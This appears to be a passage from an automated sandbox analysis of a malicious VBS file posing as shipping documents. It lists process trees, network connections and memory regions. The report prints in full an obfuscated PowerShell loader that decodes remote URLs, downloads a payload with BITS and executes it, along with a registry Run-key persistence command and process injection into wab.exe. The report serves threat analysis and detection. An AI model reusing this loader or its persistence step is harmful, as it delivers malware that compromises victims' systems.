PID 3620 wrote to memory of 184 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 184 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 184 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 184 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 13.107.253.67:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
NL 147.78.103.250:80 147.78.103.250 tcp
US 8.8.8.8:53 250.103.78.147.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
NL 147.78.103.250:80 147.78.103.250 tcp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp

Files

memory/1188-7-0x00000257C8E50000-0x00000257C8E72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klf3aukr.vqi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1188-12-0x00007FFFD4E60000-0x00007FFFD5921000-memory.dmp

memory/1188-13-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

memory/1188-14-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

memory/1188-15-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

memory/2648-16-0x0000000074B50000-0x0000000075300000-memory.dmp

memory/2648-17-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

memory/2648-18-0x0000000005310000-0x0000000005346000-memory.dmp

memory/2648-19-0x0000000005980000-0x0000000005FA8000-memory.dmp

memory/2648-20-0x0000000005900000-0x0000000005922000-memory.dmp

memory/2648-21-0x0000000006120000-0x0000000006186000-memory.dmp

memory/2648-22-0x0000000006190000-0x00000000061F6000-memory.dmp

memory/2648-28-0x00000000062C0000-0x0000000006614000-memory.dmp

memory/1188-33-0x00007FFFD4E60000-0x00007FFFD5921000-memory.dmp

memory/1188-34-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

memory/1188-35-0x00000257C8E80000-0x00000257C8E90000-memory.dmp

memory/2648-36-0x00000000068C0000-0x00000000068DE000-memory.dmp

memory/2648-37-0x00000000069A0000-0x00000000069EC000-memory.dmp

memory/2648-38-0x0000000074B50000-0x0000000075300000-memory.dmp

memory/2648-39-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

memory/2648-40-0x0000000007920000-0x00000000079B6000-memory.dmp

memory/2648-41-0x0000000006E50000-0x0000000006E6A000-memory.dmp

memory/2648-42-0x0000000006EA0000-0x0000000006EC2000-memory.dmp

memory/2648-43-0x0000000007F70000-0x0000000008514000-memory.dmp

memory/2648-44-0x0000000008BA0000-0x000000000921A000-memory.dmp

memory/2648-45-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

memory/2648-46-0x0000000007EC0000-0x0000000007EE2000-memory.dmp

memory/2648-47-0x0000000007F30000-0x0000000007F44000-memory.dmp

memory/2648-49-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

memory/2648-50-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

memory/2648-51-0x0000000008680000-0x0000000008681000-memory.dmp

memory/2648-52-0x0000000009220000-0x000000000B214000-memory.dmp

memory/2648-53-0x0000000009220000-0x000000000B214000-memory.dmp

memory/2648-54-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

memory/2648-55-0x0000000009220000-0x000000000B214000-memory.dmp

memory/2648-56-0x0000000077571000-0x0000000077691000-memory.dmp

memory/3620-57-0x0000000001EF0000-0x0000000003EE4000-memory.dmp

memory/3620-58-0x00000000775F8000-0x00000000775F9000-memory.dmp

memory/3620-59-0x0000000077571000-0x0000000077691000-memory.dmp

memory/3620-61-0x0000000001EF0000-0x0000000003EE4000-memory.dmp

memory/3620-60-0x0000000001EF0000-0x0000000003EE4000-memory.dmp

memory/3620-62-0x0000000077571000-0x0000000077691000-memory.dmp

memory/3620-64-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/2648-63-0x0000000074B50000-0x0000000075300000-memory.dmp

memory/3620-65-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/2648-66-0x0000000009220000-0x000000000B214000-memory.dmp

memory/3620-67-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-68-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-69-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-73-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/1188-72-0x00007FFFD4E60000-0x00007FFFD5921000-memory.dmp

memory/3620-74-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-75-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-76-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-77-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-78-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-79-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-80-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-81-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-82-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-83-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-84-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-88-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-89-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-90-0x0000000000C90000-0x0000000001EE4000-memory.dmp

memory/3620-91-0x0000000000C90000-0x0000000001EE4000-memory.dmp